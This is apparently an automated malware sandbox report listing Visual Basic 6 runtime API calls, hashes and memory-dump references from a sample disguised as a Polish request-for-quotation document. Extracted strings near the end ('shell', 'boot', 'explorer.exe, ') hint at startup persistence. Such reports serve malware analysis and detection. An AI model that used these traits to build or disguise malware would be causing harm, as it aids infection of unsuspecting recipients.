                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1728155253-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                                                                                                                                                                                      • Instruction ID: 5eaa79c7dd67bbe53d223c6610bcbbbf959998076f90a4c84057eb8df8a5bbf3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F10374D00208EFDB14DFA4C988ADEBBB5FF48304F20816DE50AAB291D779A985CF55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00419C7E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00419CAE
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00419CCB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000002,00000000,?,?,?,00000000,Function_000032B6), ref: 00419CE7
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419D24
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419D3D
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419D56
                                                                                                                                                                                                                                                      • __vbaStrFixstr.MSVBVM60(00000104,?,00000001), ref: 00419DB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419DC3
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,004099EC,00000000), ref: 00419DD1
                                                                                                                                                                                                                                                      • __vbaStrFixstr.MSVBVM60(00000104,?,-00000001), ref: 00419DED
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419DFB
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000), ref: 00419E02
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419E10
                                                                                                                                                                                                                                                      • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 00419E29
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419E51
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00419E67
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00419E83
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419EA8
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419EC1
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419EDA
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 00419F0D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$AnsiMove$Fixstr$#616ChkstkFreeListLset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3958989997-0
                                                                                                                                                                                                                                                      • Opcode ID: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                                                                                                                                                                                      • Instruction ID: f493f75851a7fc0dbfc09fa37243ff87ef1c3d0c798e8d4c224362c0094269ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5612D71901259EFDB10EFA0CE4CBEEB778EB48305F1081E9E10AB6190DB785A84CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0042271E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042274B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0042275A
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00422779
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00422788
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 0042279C
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 004227AA
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 004227BA
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 004227C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004227CE
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 00422801
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 00422808
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422813
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422823
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 0042282E
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042283E
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042284B
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00422866
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422876
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 0042287D
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004228BA), ref: 004228AA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004228B3
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 004228D0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2204187013-0
                                                                                                                                                                                                                                                      • Opcode ID: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                                                                                                                                                                                      • Instruction ID: 20b1ae5d524e12f90e8be89b45e8a07560083909273999c33b36cc12d9e9d757
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3441DC71D00248EFDB04EFA4DB4DBDEBBB4EB48705F108169E502B76A0DB785A44CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaAryConstruct2.MSVBVM60(?,0040A1B4,00000011,00000000,6CFB285F,6CFA1654), ref: 00426547
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00426571
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00426582
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000), ref: 00426592
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042659F
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,00000000), ref: 004265AB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004265B2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 004265B5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004265C0
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A198,00000000), ref: 004265C8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004265E5
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00426619
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042662F
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426640
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426647
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A1AC,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042664F
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426666
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042666D
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(0040A1A4,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426675
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 004266AD
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00426706), ref: 004266FF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2170920009-0
                                                                                                                                                                                                                                                      • Opcode ID: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                                                                                                                                                                                      • Instruction ID: fe4e2f04ec6deddc8f2c7747cb95564e443f1ff94db73ec5ebb53e34e52d70e0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E51A371E002299BDB24DBB4CD45FEEBBB9EF48700F20822AE545FB291DA745904CF94
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 00428E91
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428E9F
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EAA
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428ED0
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 00428EDD
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428EF0
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EFB
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428F1B
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 00428F20
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428F45
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A308,00000078), ref: 00428F65
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00428F6D
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007B0), ref: 00428F94
                                                                                                                                                                                                                                                      • #519.MSVBVM60(?), ref: 00428F9A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00428FA5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00428FB9
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 00428FC5
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?), ref: 00428FCF
                                                                                                                                                                                                                                                      • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00428FFC
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0042900E
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00429046), ref: 0042903F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2502233557-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                                                                                                                                                                                      • Instruction ID: 8420092584710669aa1959ba4e0b61b057cd928f4a57778ab52aa14ced9d5afd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC513C71A01218ABDB00EFA5DE48EDEBBB8FF58704F10416AF505F62A0D7789905CF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041983E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041986E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00419889
                                                                                                                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 004198A3
                                                                                                                                                                                                                                                      • #606.MSVBVM60(?,?), ref: 004198BA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004198C5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004198CE
                                                                                                                                                                                                                                                      • __vbaStrI2.MSVBVM60(00000000,00000000), ref: 004198DF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004198EA
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004198F5
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,00000000), ref: 00419900
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041990F
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,000000FF,00000000), ref: 00419927
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00419935
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419949
                                                                                                                                                                                                                                                      • #644.MSVBVM60(?), ref: 0041995D
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041996C
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,?), ref: 0041997A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419985
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004199D0), ref: 004199C9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?), ref: 004199E6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$FreeMoveSystem$Ansi$#606#616#644BstrChkstkListOverflowUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3094200983-0
                                                                                                                                                                                                                                                      • Opcode ID: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                                                                                                                                                                                      • Instruction ID: c4f5bd512d1b3bf9bc8ce298c4f3288c9308f79173eb6556b40925b4054b111f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B410FB5900249EFDB04DFE4DE49BDEBBB8EB48305F104669F601B72A0DB746A44CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                                                                                                                                                                                        • Part of subcall function 004295B0: __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$AnsiFreeUnicode$Copy$#516#631ErrorList$BstrChkstkSystem
                                                                                                                                                                                                                                                      • String ID: boot$explorer.exe, $shell$yLb+$8
                                                                                                                                                                                                                                                      • API String ID: 913952100-2157437457
                                                                                                                                                                                                                                                      • Opcode ID: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                                                                                                                                                                                      • Instruction ID: 6554cbec377a6d1fb2d016b249b8349fe5e87df9b4ee87d3b31f4120235b6aae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E311072910208EBCB05EF94DE58EDE7BB8FB48300F10812AF502B75A0DB745A48CBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FCC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FD9
